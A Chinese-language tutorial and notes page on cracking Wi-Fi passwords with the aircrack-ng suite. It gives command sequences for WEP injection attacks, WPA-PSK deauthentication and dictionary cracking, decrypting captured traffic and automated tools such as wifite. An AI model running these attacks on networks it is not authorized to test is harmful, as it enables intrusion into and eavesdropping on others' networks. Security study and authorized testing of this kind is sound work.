破解wifi详细教程及笔记总结
文章目录
破解WEP
由于wep破解基于有效数据报文的积累,当收集到足够数量的ivs数据报文后就可以进行破解,对目标ap使用arprequest注入攻击。
- ifconfig wlan0 up
- (airmon-ng start wlan0)
- airodump-ng -w 文件名 -c 频道 mon0
- aireplay-ng -3 -b AP的mac -h 客户端的mac mon0
- aircrack-ng 捕获的cap文件或ivs文件
破解WAP
WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要
- ifconfig wlan0 up
- 1airmon-ng wlan0 up?(airmon-ng start wlan0)
- airodump-ng -w 文件名 -c 频道 mon0
- aireplay-ng -0 10 -a AP的mac地址 -c 客户端的mac地址 mon0
- aircrack-ng -w 字典 捕获的cap文件 Linux下可以使用pyrit工具利用GPU加速破解密码;
aircrack-ng包含的主要组件
- aircrack-ng:主要用于WEP及WPA-PSK密码的恢复,只要airodump-ng收集到足够数量的数据包。aircrack-ng就可以自动检测数据包并判断是否可以破解
- airmon-ng:用于改变无线网卡工作模式,以便其他工具顺利使用
- airodump-ng:用于捕获802.11数据报文,以便aircrack的破解
- aireplay-ng:在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量
- airserv-ng:可以将无线网卡连接至某一特定端口,为攻击时灵活调用做准备
- airolib-ng:进行WPA Rainbow Table攻击时使用,用于建立特定的数据库文件
- airdecap-ng:用于解开处于加密状态的数据包
- airdriver-ng:用于显示出aircrack-ng所支持的全部无线网卡芯片列表
- airdecloak-ng:用于分析无线数据报文时过滤出指定无线网络数据
- packetforge-ng:为注入攻击制作特殊加密报文,主要用于无线客户端破解攻击
- wesside-ng:自动化的WEP破解攻击,加入fragementation攻击能力
- tkiptun-ng:主要针对采用WPA TKIP加密且启用Qos的无线网络
- easside-ng等
抓取无线数据报文:可以用airodump-ng、Wireshark等工具来对无线网进行抓包。通常无线数据加密是不可读取的,当安全人员或者攻击者破解出WEP或者WPA密码后,就可以用airdecap-ng来实现对原本加密的危险数据进行解密,具体命令如下:
(WPA)airdecap-ng -l -e 目标ap的essid -p WPA密码 无线数据报文
(WEP)airdecap-ng -w WEP密钥(十六进制码) 捕获的无线数据包
解密后就可以使用Wireshark工具开打开解密的无线数据报文
ivstool工具:
- 合并ivs文件:
ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs
- 转换cap文件为ivs文件
ivstools --convert test.cap test.ivs
- 合并ivs文件:
将cap文件转换为ivs文件不但可以提高破解效率,也可以减少cap文件占据的空间。
wifi全自动破解工具:wifite
WEP自动化破解工具:wessid-ng -v ap的mac地址 -k 重传次数 -i 无线网卡
wpa自动化攻击工具:(效果不行)tkiptun-ng -h 客户端的mac地址 -a ap的mac地址 -m 最小数据包 -n 最大数据包 网卡
wps扫描工具:wpscan.py和wpspy.py
./wpscan.py -i mon0 wpspy.py -i mon0 -e ap的mac地址(可选)探测wps的状态
airdecloak过滤数据包
airdecloak-ng --bssid mac地址--filters signal -i 捕获的数据报文